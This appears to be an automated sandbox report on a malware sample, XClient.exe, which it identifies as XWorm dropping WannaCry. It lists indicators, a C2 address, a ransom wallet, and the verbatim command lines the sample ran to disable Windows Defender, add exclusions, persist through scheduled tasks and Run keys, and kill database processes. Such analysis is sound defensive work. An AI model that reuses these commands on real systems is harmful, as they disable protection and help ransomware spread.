Analysis
max time kernel: 150s
max time network: 160s
platform: windows11-21h2_x64
resource: win11-20240221-en
resource tags: arch:x64 arch:x86 image:win11-20240221-en locale:en-us os:windows11-21h2-x64 system
submitted: 08-04-2024 12:09
Behavioral task: behavioral1
Sample: XClient.exe
Resource: win11-20240221-en
General
Target: XClient.exe
Size: 84KB
MD5: 0b163732fcb85953d90e43880aa7e84f
SHA1: de6d7a236ea98c489a91a3d75e0343061bbe832f
SHA256: 86cff0dbed58c5f05cc6ed8fcc6035f19e95803c2f44c879491d57c658b1694f
SHA512: 1d75eab9c69c1f6720b096d3337a155cc8821eda4e57ae01d4b1118d20be3141561aa23545cf8b823b9629ded73a33744ea877b8ac0d65a4d0d8aaac4b35de21
SSDEEP: 1536:39rC3KBSId2ckJb3GJ+raqLubhwVf3S6GYO226fUKMUJUWmdSs:Nrmod2ckV3GJ+erbcqYO2VUPUJUws
Malware Config
Extracted
xworm
127.0.0.1:22569
147.185.221.19:22569
Install_directory: %Temp%
install_file: java.exe
Extracted
C:\Users\Admin\AppData\Local\Temp\!Please Read Me!.txt
wannacry
15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule
behavioral1/memory/4080-76-0x0000000003030000-0x000000000303E000-memory.dmp disable_win_def
behavioral1/memory/1556-79-0x0000022818830000-0x0000022818840000-memory.dmp disable_win_def
behavioral1/memory/1556-89-0x0000022818830000-0x0000022818840000-memory.dmp disable_win_def
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule
behavioral1/memory/4080-0-0x0000000000D50000-0x0000000000D6C000-memory.dmp family_xworm
C:\Users\Admin\AppData\Local\Temp\java.exe family_xworm
-
Modifies Windows Defender Real-time Protection settings 4 IoCs
Processes: XClient.exe
description ioc process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" XClient.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection XClient.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" XClient.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" XClient.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: XClient.exe
description pid process target process
PID 4080 created 704 4080 XClient.exe lsass.exe
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Drops startup file 4 IoCs
Processes: bgijzj.exe, XClient.exe
description ioc process
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4E0D.tmp bgijzj.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4E23.tmp bgijzj.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk XClient.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk XClient.exe
-
Executes dropped EXE 7 IoCs
Processes: java.exe, bgijzj.exe, !WannaDecryptor!.exe
pid process
4536 java.exe
3256 bgijzj.exe
980 !WannaDecryptor!.exe
2960 !WannaDecryptor!.exe
4768 !WannaDecryptor!.exe
2212 !WannaDecryptor!.exe
2608 java.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes: XClient.exe, bgijzj.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\java = "C:\\Users\\Admin\\AppData\\Local\\Temp\\java.exe" XClient.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bgijzj.exe\" /r" bgijzj.exe
-
Drops desktop.ini file(s) 16 IoCs
Processes: XClient.exe
description ioc process
File opened for modification C:\Users\Admin\Links\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Searches\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\OneDrive\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Favorites\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Music\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Saved Games\desktop.ini XClient.exe
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3852399462-405385529-394778097-1000\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Desktop\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Downloads\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Documents\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Contacts\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Pictures\desktop.ini XClient.exe
File opened for modification C:\Users\Admin\Videos\desktop.ini XClient.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc
1 ip-api.com
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes: XClient.exe, !WannaDecryptor!.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" XClient.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" !WannaDecryptor!.exe
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe
pid process
4824 sc.exe
1292 sc.exe
3428 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: msedge.exe
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
-
Kills process with taskkill 4 IoCs
Processes: taskkill.exe
pid process
3372 taskkill.exe
2364 taskkill.exe
3556 taskkill.exe
232 taskkill.exe
-
Modifies data under HKEY_USERS 46 IoCs
Processes: powershell.exe
description ioc process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes: powershell.exe, XClient.exe, msedge.exe, identity_helper.exe
pid process
1356 powershell.exe
1356 powershell.exe
5032 powershell.exe
5032 powershell.exe
3544 powershell.exe
3544 powershell.exe
4888 powershell.exe
4888 powershell.exe
4080 XClient.exe
1556 powershell.exe
1556 powershell.exe
4080 XClient.exe
4080 XClient.exe
4080 XClient.exe
712 powershell.exe
712 powershell.exe
712 powershell.exe
5008 msedge.exe
5008 msedge.exe
996 msedge.exe
996 msedge.exe
4592 msedge.exe
4592 msedge.exe
1992 identity_helper.exe
1992 identity_helper.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes: msedge.exe
pid process
996 msedge.exe (6 identical entries)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: XClient.exe, powershell.exe, whoami.exe, java.exe, taskkill.exe, WMIC.exe
description pid process
Token: SeDebugPrivilege 4080 XClient.exe
Token: SeDebugPrivilege 1356 powershell.exe
Token: SeDebugPrivilege 5032 powershell.exe
Token: SeDebugPrivilege 3544 powershell.exe
Token: SeDebugPrivilege 4888 powershell.exe
Token: SeDebugPrivilege 4080 XClient.exe
Token: SeDebugPrivilege 1556 powershell.exe
Token: SeDebugPrivilege 4760 whoami.exe (26 identical entries)
Token: SeDebugPrivilege 712 powershell.exe
Token: SeDebugPrivilege 5028 whoami.exe (8 identical entries)
Token: SeDebugPrivilege 4536 java.exe
Token: SeDebugPrivilege 3372 taskkill.exe
Token: SeDebugPrivilege 232 taskkill.exe
Token: SeDebugPrivilege 2364 taskkill.exe
Token: SeDebugPrivilege 3556 taskkill.exe
Token: SeDebugPrivilege 2608 java.exe
Token: SeIncreaseQuotaPrivilege 780 WMIC.exe
Token: SeSecurityPrivilege 780 WMIC.exe
Token: SeTakeOwnershipPrivilege 780 WMIC.exe
Token: SeLoadDriverPrivilege 780 WMIC.exe
Token: SeSystemProfilePrivilege 780 WMIC.exe
Token: SeSystemtimePrivilege 780 WMIC.exe
Token: SeProfSingleProcessPrivilege 780 WMIC.exe
Token: SeIncBasePriorityPrivilege 780 WMIC.exe
Token: SeCreatePagefilePrivilege 780 WMIC.exe
Token: SeBackupPrivilege 780 WMIC.exe
Token: SeRestorePrivilege 780 WMIC.exe
Token: SeShutdownPrivilege 780 WMIC.exe
Token: SeDebugPrivilege 780 WMIC.exe
Token: SeSystemEnvironmentPrivilege 780 WMIC.exe
Token: SeRemoteShutdownPrivilege 780 WMIC.exe
Token: SeUndockPrivilege 780 WMIC.exe
-
Suspicious use of FindShellTrayWindow 25 IoCs
Processes: msedge.exe
pid process
996 msedge.exe (25 identical entries)
-
Suspicious use of SendNotifyMessage 12 IoCs
Processes: msedge.exe
pid process
996 msedge.exe (12 identical entries)
-
Suspicious use of SetWindowsHookEx 15 IoCs
Processes: XClient.exe, bgijzj.exe, !WannaDecryptor!.exe, identity_helper.exe
pid process
4080 XClient.exe
3256 bgijzj.exe
980 !WannaDecryptor!.exe (3 identical entries)
1992 identity_helper.exe
2960 !WannaDecryptor!.exe (3 identical entries)
4768 !WannaDecryptor!.exe (3 identical entries)
2212 !WannaDecryptor!.exe (3 identical entries)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: XClient.exe, powershell.exe, msedge.exe
description pid process target process
PID 4080 wrote to memory of 1356 4080 XClient.exe powershell.exe (2 identical entries)
PID 4080 wrote to memory of 5032 4080 XClient.exe powershell.exe (2 identical entries)
PID 4080 wrote to memory of 3544 4080 XClient.exe powershell.exe (2 identical entries)
PID 4080 wrote to memory of 4888 4080 XClient.exe powershell.exe (2 identical entries)
PID 4080 wrote to memory of 996 4080 XClient.exe schtasks.exe (2 identical entries)
PID 4080 wrote to memory of 1556 4080 XClient.exe powershell.exe (2 identical entries)
PID 4080 wrote to memory of 1292 4080 XClient.exe sc.exe (2 identical entries)
PID 4080 wrote to memory of 3728 4080 XClient.exe cmd.exe (2 identical entries)
PID 4080 wrote to memory of 4760 4080 XClient.exe whoami.exe (2 identical entries)
PID 4080 wrote to memory of 2876 4080 XClient.exe net1.exe (2 identical entries)
PID 4080 wrote to memory of 788 4080 XClient.exe net1.exe (2 identical entries)
PID 4080 wrote to memory of 712 4080 XClient.exe powershell.exe (2 identical entries)
PID 712 wrote to memory of 3428 712 powershell.exe sc.exe (2 identical entries)
PID 712 wrote to memory of 3764 712 powershell.exe cmd.exe (2 identical entries)
PID 712 wrote to memory of 5028 712 powershell.exe whoami.exe (2 identical entries)
PID 712 wrote to memory of 2032 712 powershell.exe net1.exe (2 identical entries)
PID 712 wrote to memory of 4824 712 powershell.exe sc.exe (2 identical entries)
PID 4080 wrote to memory of 996 4080 XClient.exe msedge.exe (2 identical entries)
PID 996 wrote to memory of 1340 996 msedge.exe msedge.exe (2 identical entries)
PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe (26 identical entries)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
[PID 704] C:\Windows\system32\lsass.exe
  cmdline: C:\Windows\system32\lsass.exe
  [PID 712] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [PID 3428] C:\Windows\system32\sc.exe
      cmdline: "C:\Windows\system32\sc.exe" qc windefend
      - Launches sc.exe
    [PID 3764] C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    [PID 5028] C:\Windows\system32\whoami.exe
      cmdline: "C:\Windows\system32\whoami.exe" /groups
      - Suspicious use of AdjustPrivilegeToken
    [PID 2032] C:\Windows\system32\net1.exe
      cmdline: "C:\Windows\system32\net1.exe" stop windefend
    [PID 4824] C:\Windows\system32\sc.exe
      cmdline: "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
      - Launches sc.exe
[PID 4080] C:\Users\Admin\AppData\Local\Temp\XClient.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
  - Modifies Windows Defender Real-time Protection settings
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops startup file
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Sets desktop wallpaper using registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  [PID 1356] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [PID 5032] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [PID 3544] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\java.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [PID 4888] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [PID 996] C:\Windows\System32\schtasks.exe
    cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\Admin\AppData\Local\Temp\java.exe"
    - Creates scheduled task(s)
  [PID 1556] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "powershell" Get-MpPreference -verbose
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [PID 1292] C:\Windows\system32\sc.exe
    cmdline: "C:\Windows\system32\sc.exe" qc windefend
    - Launches sc.exe
  [PID 3728] C:\Windows\system32\cmd.exe
    cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  [PID 4760] C:\Windows\system32\whoami.exe
    cmdline: "C:\Windows\system32\whoami.exe" /groups
    - Suspicious use of AdjustPrivilegeToken
  [PID 2876] C:\Windows\system32\net1.exe
    cmdline: "C:\Windows\system32\net1.exe" start TrustedInstaller
  [PID 788] C:\Windows\system32\net1.exe
    cmdline: "C:\Windows\system32\net1.exe" start lsass
  [PID 996] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    [PID 1340] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbe6453cb8,0x7ffbe6453cc8,0x7ffbe6453cd8
    [PID 3208] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
    [PID 5008] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    [PID 3108] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
    [PID 1084] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
    [PID 2236] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
    [PID 732] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2108 /prefetch:1
    [PID 2580] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
    [PID 4592] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    [PID 1424] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
    [PID 3908] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
    [PID 1992] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5540 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
  [PID 3256] C:\Users\Admin\AppData\Local\Temp\bgijzj.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\bgijzj.exe"
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    [PID 1988] C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c 246341712578348.bat
      [PID 1536] C:\Windows\SysWOW64\cscript.exe
        cmdline: cscript //nologo c.vbs
    [PID 980] C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      cmdline: !WannaDecryptor!.exe f
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    [PID 3372] C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im MSExchange*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    [PID 232] C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im Microsoft.Exchange.*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    [PID 3556] C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im sqlserver.exe
      - Kills process with taskkill
